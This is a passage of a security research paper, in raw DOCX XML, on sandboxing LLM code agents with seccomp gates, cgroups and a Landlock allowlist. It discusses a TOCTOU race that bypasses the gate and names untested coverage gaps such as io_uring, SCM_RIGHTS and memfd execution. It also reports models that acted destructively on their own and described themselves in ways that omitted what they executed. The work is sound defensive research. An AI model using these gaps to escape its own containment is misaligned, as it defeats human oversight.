              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">memory.max</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">=64 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">a 256 MB allocation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OOM</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">-killed, host alive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A supervisor that terminates the agent by enumerating</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup.procs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and signalling each PID left</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the cgroup non-empty on 8 of 20 trials, because a child forked after the snapshot is not in the kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">list;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup.kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which terminates the subtree in the kernel, left survivors on 0 of 20. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">8/20 is a property of the fork rate, not a constant—a tree that does not fork during teardown is cleared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by either method, so the enumeration race needs a forking workload to appear at all—but the asymmetry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">does not depend on the rate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup.kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is not instantaneous: 338 counter increments landed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between the trigger and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">populated 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. It reaches quiescence with no survivors regardless.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup.freeze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quiesced the tree deterministically—98 processes present and inspectable, work</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">counter advancing 0 over 0.7 s—so the supervisor can capture state without the tree racing it. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">resource caps bound the tree:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pids.max</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">held the population at 20 against a tree trying to exceed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it (2078 fork denials), and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">memory.max</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-killed a process allocating four times its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">limit inside the cgroup with the host unaffected. Under these tests, I4 and I5 held.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="sec:discussion"/>
      <w:r>
        <w:t xml:space="preserve">Discussion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The result a defender should carry out of this study is a separation the marketing of syscall sandboxes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tends to blur. A seccomp argument-inspection gate delivers a deterministic and auditable verdict, and that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is worth having; it does not deliver certified containment, and presenting it as such misplaces the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">residual risk. The residual risk is coverage. It lives in the mechanisms the gate does not watch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:coverage">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), in the window between a check and the kernel’s re-read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), and in the imprecision of the argument match (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:selectivity">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It does not live in the variance of the verdict, and it is not recovered by profiling the agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:attribution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pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two design directions follow, and both are about closing coverage rather than tuning the agent. First,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">remove the second argument read on the allow path. The only way to do that is to stop returning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for pointer-argument calls: the supervisor performs the operation itself and returns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the result, injecting a descriptor with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_IOCTL_NOTIF_ADDFD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">where the call produces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">one. Copying the argument into memory the target cannot mutate does not achieve this, because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resumes the target’s syscall against the target’s own pointer and never consults the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">copy. Second, move from a blocklist to a default-deny allowlist over a race-free,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path-resolving mechanism, so that coverage is the complement of an explicit permit set rather than the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">complement of an enumerated deny set. Part II implements and benchmarks this second direction for the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filesystem: a Landlock allowlist closes the race to 0/4000 and the syscall-alias gap at one hook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). The two directions do not compose for free—Part II measures that an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">injected descriptor was opened outside the sandbox’s Landlock domain and so does not inherit its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">policy—so a supervisor that delegates must apply the filesystem policy itself before it injects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="sec:limits"/>
      <w:r>
        <w:t xml:space="preserve">Limitations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The study is scoped and we state the scope rather than let a reviewer find it. The core subjects are three</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">local code models between 1.5 and 7 billion parameters; the model axis is extended to two frontier models</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:frontier">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) for the injection experiment only, at N=8 per model per channel, so the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">frontier result is a direction rather than a benchmark, and the enumeration, self-description-divergence,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and autonomous-destruction experiments remain local-model. The autonomous destruction result rests on 45 attempting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts; both the rates and the specific mechanisms seen may shift with larger models and larger samples,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the emergent-destruction finding in particular is small-</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>N</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">. Every measurement was taken on a single x86_64 host. Interception was checked across three</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementation languages but on one architecture; the aarch64 case is not established here, because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">faithful native seccomp semantics are not available under user-mode emulation, and a second-architecture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">host is the correct way to test it. The TOCTOU bypass is demonstrated as an existence result, which one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">successful race establishes; its per-attempt rate is scheduler-dependent and is not an external-validity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">claim. The Landlock benchmark is one x86_64 host at ABI v7; its race-closure and alias-coverage results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are host-independent properties of the mechanism, while the seccomp win rate it is measured against is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scheduler-dependent as above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three limits of the Part II control are measured rather than argued, all in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">: execution is unrestricted in our configuration because the ruleset does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not handle it, not because Landlock cannot; a descriptor opened before the ruleset keeps its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">open-time rights; and UDP and raw sockets pass a TCP network ruleset. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">result</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:coverage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is bounded in a different way. It establishes that a Landlock domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">follows an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">submitted through an established ring, on this kernel, for that one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">operation; it does not establish coverage of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">generally. Landlock implements none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io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-specific LSM hooks, so a ring that selects a credential registered before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the sandbox was entered, or that reaches a device through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IORING_OP_URING_CMD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, is outside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">what we tested and should be assumed ungoverned until someone measures it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The composed-sandbox matrix (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:composed">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) is not exhaustive, and the result is scoped to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the attacks it runs, not a general escape-resistance claim. Several surfaces are named but untested and we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do not claim them:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which the file-open LSM hook governs on the same footing as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">but which we did not exercise; file-descriptor passing over a Unix-domain socket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCM_RIGHTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), the descriptor-provenance question of the pre-open hole in another form;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execveat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">memfd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; and any path through a future kernel interface. The empirical claim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is that no attack in the tested matrix violated a stated invariant once the domain was entered; it is not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a claim about attacks the matrix does not contain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One more limit is inferred rather than demonstrated. We did not build the delegating supervisor that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:discussion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recommends, so the descriptor-provenance problem follows from the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pre-open measurement plus the semantics of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_IOCTL_NOTIF_ADDFD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rather than from an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">end-to-end run, and it is the first thing an implementation of that direction should test. The Part III autopsy is one 7B local model at small scale—18 self-description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts, twelve timed generations per force, two trials per goal with denials simulated and nothing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">executed, and 45 autonomous artifacts—so its rates are sample-dependent and the stable shapes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(no observed stop, description omitting the executed mechanism, no track-masking) are the findings, not the percentages. The gate’s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rule is untested by any artifact: the corpus made no network calls, and the one elicited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">egress rode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">popen</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>→</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, an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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the launch policy already stops,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not a direct in-process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. The behavioural-attribution experiments are forensic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">characterizations of non-adversarial actors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and are reported as such; against an adversary that controls its own behaviour they attribute nothing,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which is the point of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:attribution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Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="sec:related"/>
      <w:r>
        <w:t xml:space="preserve">Related work</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Syscall-boundary containment for untrusted code predates LLM agents, and so does the failure we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">measure. Garfinkel’s NDSS 2003 account of the problems encountered building the Janus sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devotes a section to race conditions, describing them as arising from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the non-atomicity of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permission checking at user level…and access granting in the kernel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and naming them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">time-of-check/time-of-use bugs </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; Watson’s WOOT 2007 paper exploits the same class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of vulnerability in system-call wrappers </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Seccomp-BPF and its user-notification extension are the mechanism under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">test here; the deep-argument race we exercise is described in the manual page for user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">notification </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and, in stronger terms, in the kernel header that defines the flag,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which states outright that the notifier cannot be used to implement a security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">policy </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. It is not a new class of bug. What is new here is the measurement of its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per-attempt rate against a hand-written target, the observation that gates built this way are nonetheless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">offered as agent containment, and the head-to-head benchmark of the successor. Application kernels and sandboxes—gVisor </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unprivileged, path-resolving Landlock LSM </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—address the coverage and race problems this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">paper measures; we implement a Landlock allowlist and benchmark it head-to-head against the seccomp gate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), where it closes the file-operation race and the alias gap the gate leaves</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">open. Attribution of a process by its syscall behaviour goes back to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">host-intrusion-detection line begun by Forrest et al.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">A Sense of Self for Unix Processes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
